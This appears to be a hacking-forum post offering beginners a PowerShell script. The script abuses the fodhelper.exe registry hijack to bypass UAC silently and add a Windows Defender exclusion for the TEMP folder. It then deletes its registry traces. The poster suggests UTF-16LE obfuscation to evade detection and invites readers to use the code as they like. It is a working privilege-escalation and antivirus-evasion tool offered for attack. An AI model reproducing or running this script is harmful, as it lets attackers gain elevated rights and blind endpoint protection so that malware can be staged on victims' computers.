04-01-2025, 12:57 AM
hello here is a little something/ script for some beginners
this power-shell code is simple yet effective
it adds a windows defender exclusion to the "&env:TEMP" directory
hope you like it.
its unfortunately detected by windows defender but if added
some kind of obfuscation like (UTF-16LE) it could
help detection rates.
either way use this code to your liking.
this power-shell code is simple yet effective
it adds a windows defender exclusion to the "&env:TEMP" directory
hope you like it.
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
$command = "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command `"Add-MpPreference -ExclusionPath '$env:Temp'`""
# Clean up any existing registry entries (silently continue if they don't exist)
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force -ErrorAction SilentlyContinue
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $command Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
Start-Sleep -Seconds 3
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force -ErrorAction SilentlyContinue
Write-Host "Exclusion path '$env:Temp' added to Windows Defender."
} else {
Add-MpPreference -ExclusionPath "$env:Temp"
Write-Host "Exclusion path '$env:Temp' added to Windows Defender (already elevated)."
}its unfortunately detected by windows defender but if added
some kind of obfuscation like (UTF-16LE) it could
help detection rates.
either way use this code to your liking.